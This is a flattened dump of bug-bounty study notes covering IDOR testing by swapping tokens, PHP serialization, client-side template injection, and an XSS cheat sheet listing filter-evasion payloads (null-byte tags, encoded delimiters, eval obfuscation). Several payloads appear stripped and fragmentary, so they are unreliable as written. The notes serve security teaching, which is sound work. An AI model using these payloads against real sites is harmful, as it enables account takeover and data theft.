https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83.md: -------------------------------------------------------------------------------- 1 | # IDOR 2 | 3 | # What is it 4 | 5 | IDOR: Insecure Direct Object Reference 6 | 7 | These types of vulnerabilities arise from acces control issues. We will devote another entire chapter to those types of vulnerabilities. The term IDOR was made popular in by appearing in the OWASP top 10 but in reality it's simply another type of Broken Access Control issue. IDORs can manifest in both horizontal and vertical privilege escalation. To speak of an IDOR, the following conditions have to be met: 8 | 9 | - An object identifier exists in the request, either as GET or POST parameter 10 | - A Broken Access Control issue has to exist allowing the user access to data they should not be able to access 11 | 12 | These terms may seem abstract so let's look at an example: 13 | 14 | - GET /invoice.php?id=12 15 | - POST /personalInfo.php 16 | - {personId:23,name:"tester"} 17 | - GET /invoices/1234.txt 18 | 19 | In these examples we can see a POST and a GET request being made, both contain an identifier. In a normal situation, the user can only access invoices or personal data that belong to them. If we however change this identifier and get data returned that does not belong to our user, we have an IDOR. 20 | 21 | This may seem like a simple interpretation of IDORs, but this is basically how it works. The complexity comes from how we can automate looking for this and from the different users in involved. 22 | 23 | # Attack strategy 24 | 25 | We can basically take a manual or semi-automated strategy for this. 26 | 27 | ## Manually 28 | 29 | Manually searching for IDORs is probably the easiest way. In a previous chapter we went over your main attack strategy. This stated that you should explore the website with your MitM proxy in the background. (See general attack strategy). Burp suite has an option to show parameterised requests: 30 | 31 | ![IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled.png](IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled.png) 32 | 33 | ![IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled%201.png](IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled%201.png) 34 | 35 | We can use this filter to show us any request that contains parameters. We will have to go through these requests manually and send the requests that contain identifiers to the repeater. 36 | 37 | In the repeater we can replace the authentication methods the are expected by the server with some valid authentication tokens. 38 | 39 | - JWT in authorisation header might need to be replaced 40 | - Session cookies might need to be replaced 41 | - Custom authentication methods may be in place 42 | 43 | You will need to identify which authentication mechanism is being used and make sure you replace any expired authentication methods with valid ones. Grab new valid tokens by logging in and making similar requests. 44 | 45 | Now that you have the request working in the repeater, we can try replacing the identifiers in the request. 46 | 47 | **BE CAREFUL: You are a bug bounty hunter, you are testing a live production environment. Do not fill in a random identifier. Instead create a new account. Log into that account and navigate to the same functionality.** 48 | 49 | Example: 50 | 51 | - We have a request going to GET /invoice.php?id=12 52 | - Send it to the repeater 53 | - The request contains a JWT token in the authorization header that is expired 54 | - When you launch the request, it will return a 500 because the JWT is expired 55 | - Log in to the application and check the http history in your proxy tab 56 | - One of the latest requests should contain a JWT token that's valid 57 | - Copy that JWT token 58 | - Replace the expired JWT token in your repeater 59 | - You should get a 200 OK response from the server now 60 | - Create a new account 61 | - Log into that account and check the http history in your proxy tab 62 | - One of the latest requests should contain a JWT token that's valid 63 | - Copy that JWT token 64 | - Replace the JWT token in your repeater 65 | - If you are now receiving a 200 OK response from the server AND the content of the invoice, you have an IDOR 66 | 67 | ## Semi-automated testing 68 | 69 | ### **Authorize** 70 | 71 | Please refer to Tools > Burp Authorize 72 | 73 | ### Match and replace 74 | 75 | Please refer to Tools > Burp: Match and replace -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83/Untitled 1.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad.md: -------------------------------------------------------------------------------- 1 | # Insecure deserialization 2 | 3 | # Introduction 4 | 5 | Insecure deserialization is often seen as a very hard vulnerability type but it doesn't have to be. It does require decent knowledge of the programming languages in question but it can also occur very trivially if you have some knowledge of the programming languages. 6 | 7 | In this module we will be looking at Java, PHP and Ruby deserialization processes by practical examples on the portswigger labs. This will allow us to better understand the concept. 8 | 9 | # Serialization 10 | 11 | If we want to learn about deserialization processes we first need to learn about what serialization is. When we talk about serialization, we are talking about the processing complex structures such as objects (For example a person with an age,sex and name) into a much flatter format so that it can sent and received in a sequential stream of bytes. This allows us to write complex data to memory, files or databases and also to send that data over the network to different API's. 12 | 13 | When we serilalise data, we save it's attributes and their values, this is really important to remember. Such as a female person of 16 years of age with the name "Sophie Kent" will get turned into something like {female|16|Sophie|kent} 14 | 15 | For example, consider a User object with the attributes in PHP: 16 | 17 | ```php 18 | $user->name = "carlos"; 19 | $user->isLoggedIn = true; 20 | ``` 21 | 22 | When serialized, this object may look something like this: 23 | 24 | ```php 25 | O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;} 26 | ``` 27 | 28 | This can be interpreted as follows: 29 | 30 | ```php 31 | O:4:"User" - An object with the 4-character class name "User" 32 | 2 - the object has 2 attributes 33 | s:4:"name" - The key of the first attribute is the 4-character string "name" 34 | s:6:"carlos" - The value of the first attribute is the 6-character string "carlos" 35 | s:10:"isLoggedIn" - The key of the second attribute is the 10-character string "isLoggedIn" 36 | b:1 - The value of the second attribute is the boolean value true 37 | ``` 38 | 39 | **Python refers to serialization as pickling** 40 | 41 | **Ruby refers to serialization as marshalling** 42 | 43 | # Deserialization 44 | 45 | When we Deserialize we the opposite, we use the bytestream that was created and turn it back into an object. The avid hacker will have already spotted where this can go wrong. 46 | 47 | ![Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png](Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png) 48 | 49 | How exactly the seriliasation happens depends heavily on the programming language, some might turn the objects into binary formats where others might use different string formats. Some are easy to read, some are very hard to read. 50 | 51 | # Insecure Deserialization -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled 1.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled 2.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/SSRF 810a9009d00349518ca3c663f36100ea/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Template injections 5633da87439b4f3b91e56feeb5a3332f.md: -------------------------------------------------------------------------------- 1 | # Template injections 2 | 3 | [SSTI](Template%20injections%205633da87439b4f3b91e56feeb5a3332f/SSTI%205934bbc2430f4887bf5a460087454341.md) 4 | 5 | [CSTI](Template%20injections%205633da87439b4f3b91e56feeb5a3332f/CSTI%20c1ef3fe5df3a4f60a253596e37a2883a.md) -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Template injections 5633da87439b4f3b91e56feeb5a3332f/CSTI c1ef3fe5df3a4f60a253596e37a2883a.md: -------------------------------------------------------------------------------- 1 | # CSTI 2 | 3 | # What is it? 4 | 5 | CSTI: Client side template injection 6 | 7 | This type of vulnerability occurs when developers use a client side templating engine such as vue or angular. These templating engines allow us to push code to the client that contains placeholders (ex. {{NAME}} ). These placeholders will then be replaced in the clients browser with their respective values. 8 | 9 | These types of vulnerabilities are not researched well at yet and it will be up to the hunter to properly research this vulnerability when it is encountered. First of all try to get to know what templating engine is being used, then look up how that engine works and try to find out how to exploit the issue. 10 | 11 | # Attack strategy 12 | 13 | Our attack strategy taught us that we should insert an SSTI attack vector in every possible input field. This should in theory allow us to identify CSTI vulnerabilities as well. 14 | 15 | When we identified a resolved attack vector, it’s important that we know how the templating engine works because we need to craft a good attack vector with proper impact as our basic attack vector was {{7*7}}. This attack vector would resolve to 49 which means a calculation gets executed. This would give us a pretty good idea that a CSTI vulnerability exists but ofcourse, using a website as a calculator is not really a vulnerability. We will have to increase our impact before we report this vulnerability. 16 | 17 | The impact itself will also highly depend on what we are able to pull off. CSTI vulnerabilities lead to XSS attacks which we can exploit like any other XSS attack, however if the templating engine is only used to display non-sensitive public data, there’s nothing much we can steal with our attack of value and it will be marked as a low impact issue. If, however, there exists another application on the same domain that can access the session cookies, we might be able to steal those and raise our severity. -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/V-Model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/V-Model.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/agile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/agile.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/waterfal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c/waterfal.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2.md: -------------------------------------------------------------------------------- 1 | # XSS 2 | 3 | [XSS Cheat sheet](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e.md) 4 | 5 | [General XSS Beginner Guide](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/General%20XSS%20Beginner%20Guide%20eaccd159eee04f7aaefda9b78bce0c8c.md) 6 | 7 | [DOM XSS ](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/DOM%20XSS%205e31c327eca54f2c84e07fd5e46df88a.md) -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e.md: -------------------------------------------------------------------------------- 1 | # XSS Cheat sheet 2 | 3 | # Active XSS hunting 4 | 5 | ## Attack strategy 6 | 7 | [Types of XSS](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975.csv) 8 | 9 | # Passive XSS hunting 10 | 11 | ## Attack strategy 12 | 13 | Enter "'`>Rat was here into every fields that you see. 14 | 15 | - Name, last name, adress,... at registration 16 | - Names and content of ever object you create 17 | - EVERYWHERE 18 | 19 | If you encounter a value that's reflected, determine context. 20 | 21 | [Contexts](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709.csv) 22 | 23 | # Filter evasion 24 | 25 | [Techniques](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503.csv) 26 | -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709.csv: -------------------------------------------------------------------------------- 1 | Column,JavaScript context,HTML Tag context,HTML Tag attribute context 2 | Attack vector,"'""`",Rat was here + ,"""'`>" 3 | Breaks,Breaks javascript functions,"Nothing, reflects value into HTML context without sanitise, allowing for own tags","HTML tag attribute such as ""Value"" for tag" 4 | Exploit,Try to insert our own JS code,Add event handlers to tags,Insert JS event handler or JS code into tag 5 | "Example ",'); alert(); —,,' alert(); ' -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/' ` e36ffb9f04e8440f8f5b47b7e69f5478.md: -------------------------------------------------------------------------------- 1 | # '"` 2 | 3 | Column: Attack vector 4 | HTML Tag attribute context: "'`> 5 | HTML Tag context: Rat was here + -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/'); alert(); — 912c145846154ad2a89c539bd65f48ff.md: -------------------------------------------------------------------------------- 1 | # '); alert(); — 2 | 3 | Column: Example 4 | HTML Tag attribute context: ' alert(); ' 5 | HTML Tag context: -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/Breaks javascript functions c6e6ca69b5314fce978c5b2180a6485d.md: -------------------------------------------------------------------------------- 1 | # Breaks javascript functions 2 | 3 | Column: Breaks 4 | HTML Tag attribute context: HTML tag attribute such as "Value" for tag 5 | HTML Tag context: Nothing, reflects value into HTML context without sanitise, allowing for own tags -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/Try to insert our own JS code 8a13b68fc9014164b4b0f4d929bc58fa.md: -------------------------------------------------------------------------------- 1 | # Try to insert our own JS code 2 | 3 | Column: Exploit 4 | HTML Tag attribute context: Insert JS event handler or JS code into tag 5 | HTML Tag context: Add event handlers to tags -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503.csv: -------------------------------------------------------------------------------- 1 | Name,Tags,Column 2 | Basic modifications," 3 | 4 | 5 | Encoded tabs/newlines/CR 6 | alert(1) 7 | alert(1) 8 | alert(1) 9 | Capital letters 10 | Adding nullbytes: 11 | <%00script>alert(1) 12 | ","Doing basic things like adding spaces, encoding tabs, newlines and carriege rerurns can do a lot alread" 13 | Attributes and tags," 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | <%00input type=""text"" name=""input"" value=""> 23 | 24 | 25 | ",We can do the same basic modifications to attribute tags and add things like nullbytes 26 | Event handlers,"Use burp intruder, select your event handler that's blocked and use burp suites cheat sheet to test all event handlers","Try all different event handlers 27 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 28 | Use burp intruder" 29 | Delimiters and brackers," 30 | 31 | URL encodign 32 | 33 | 34 | Backticks 35 | 36 | Encoded backtics 37 | ",Sometimes we can play with things like delimiters by encoding them if they are blocked 38 | "Delimiters and brackers - 2 ","Double use of delimiters 39 | < 40 | Unknown delimiters 41 | «input onsubmit=alert(1)» 42 | Encoded 43 | ®input onsubmit=alert(1)¯", 44 | Eval()," 45 | 46 | ",We can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered 47 | Using filtered words in filtered words,"If script is filtered 48 | might become 6 | 5 | 6 | URL encodign 7 | 8 | 9 | Backticks 10 | 11 | Encoded backtics 12 | -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Eval() 6ea0bd9725f841a59ecc7da81ef27096.md: -------------------------------------------------------------------------------- 1 | # Eval() 2 | 3 | Column: We can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered 4 | Tags: 5 | 6 | -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b.md: -------------------------------------------------------------------------------- 1 | # Event handlers 2 | 3 | Column: Try all different event handlers 4 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 5 | Use burp intruder 6 | Tags: Use burp intruder, select your event handler that's blocked and use burp suites cheat sheet to test all event handlers 7 | 8 | ![Event%20handlers%2052045e13e76a4091a4cb5891e914cd2b/Untitled.png](Event%20handlers%2052045e13e76a4091a4cb5891e914cd2b/Untitled.png) -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Use your imagination 3 6af362057ffa48158bc30b14979e51ad.md: -------------------------------------------------------------------------------- 1 | # Use your imagination <3 -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Using filtered words in filtered words 8aa56d798b6b422e986f2b2f630adab5.md: -------------------------------------------------------------------------------- 1 | # Using filtered words in filtered words 2 | 3 | Column: This helped me find many bounties 😂 4 | Tags: If script is filtered 5 | might become